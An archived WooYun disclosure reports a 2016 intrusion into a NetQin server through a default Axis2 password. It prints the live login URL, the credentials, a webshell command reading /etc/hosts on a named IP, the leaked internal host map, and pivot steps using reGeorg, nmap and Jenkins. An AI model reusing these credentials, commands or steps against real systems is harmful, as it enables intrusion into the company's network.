破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

网秦某站弱口令导致的一次内网漫游

编号219717
Urlhttp://www.wooyun.org/bug.php?action=view&id=219717
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题网秦某站弱口令导致的一次内网漫游
漏洞类型成功的入侵事件
厂商netqin.com
白帽子niliu
提交日期2016-06-16 07:46:00
公开日期2016-06-21 09:10:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签getshell
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
厂商给rank不要那么吝啬嘛 -,-
漏洞细节

纯属偶遇,由Axis2的弱口令导致getshell,然后内网漫游了一下
http://211.151.59.27:80/axis2/axis2-admin/login
admin:axis2

QQ20160615-2.png


POC

getshell
http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts

QQ20160615-1.png


QQ20160615-0.png


通过hosts可以看到是网秦的服务

HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet. While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost BJ-YZ-S-ST040
::1 localhost6.localdomain6 localhost6
127.0.0.1 oversea
192.168.3.46 bjyz.puppet.nq.com
192.168.0.41 a03 pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217 a12 app.netqin.com
211.151.59.71 a09 blyt.netqin.com
192.168.0.143 a08 i.netqin.com i.nq.com m.nq.com
192.168.5.212 a13 c.cpsserver.cns
192.168.0.148 a05 nqses.nq.com
192.168.3.35 a11 pay.netqin.com pay.nq.com
192.168.3.53 a07 my.netqin.com
192.168.3.52 a06 mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216 a15 dbapp.nq.com
192.168.5.207 a16 dbboss.nq.com
192.168.5.218 a14 dbuis.nq.com


QQ20160615-3.png


拿到shell了,reGeorg开个代理进内网
namp扫了一下内网网段,内网比较大
设计大量内部系统,wiki,jenkins,jira,内部管理系统,会议室预定系统,报表管理系统等等,以及大量开发测试文档

QQ20160615-6.png


QQ20160615-8.png


QQ20160615-10.png


QQ20160615-11.png


QQ20160615-12.png


QQ20160615-13.png


QQ20160615-14.png


QQ20160615-15.png


程序员千行bug率....

QQ20160615-16.png


jenkins 又可以搞下好多机器了

QQ20160615-17.png


QQ20160615-19.png


QQ20160615-20.png


QQ20160615-21.png


QQ20160615-22.png


可申请点卡..

QQ20160615-23.png


QQ20160615-24.png


QQ20160615-26.png


QQ20160615-27.png


不深入测试了

修复方案

1.修复弱口令
2.删除shell,不排除之前有人进来过
3.加强内网安全

状态信息 2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-21 09:10
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

这个严重额,竟然忽略了

HackBraid02016-06-21 09:26:00